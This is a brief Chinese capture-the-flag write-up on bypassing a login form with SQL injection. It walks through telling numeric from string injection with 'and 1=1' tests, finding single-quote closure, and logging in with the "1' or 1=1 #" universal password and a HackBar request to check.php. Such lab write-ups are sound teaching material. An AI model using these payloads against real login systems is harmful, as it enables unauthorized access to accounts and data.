### 考点
万能密码
1.打开是个登录框
输入admin 123
回显
2.在username,password测试注入
如何判断数字型
url地址中输入www.xxxx.com/ccc.php?id=x and 1=1
页面显示正常,继续下一步
url地址中输入www.xxxx.com/ccc.php?id=x and 1=2
页面错误,这说明存在数字型注入。
如何判断字符型
www.xxx.com/ccc.php?id=1’ and ‘1’='1
页面正常,继续下一步
www.xxx.com/ccc.php?id=1’ and ‘1’='2
页面报错,则说明存在字符型注入
试试是否是字符型1'
1"
说明是单引号闭合
1.万能账号密码:
该数据库闭合方式为单引号‘
所以此处使用单引号字符型的万能密码,即可获得正确的flag(用户名和密码至少有一个输入万能密码即可获得正确的flag)
1' or 1=1 #
2.方法二:使用HackBar进行SQL注入(思路和万能密码是一致)
再框中输入语句
/check.php?username=a' or true %23& password=1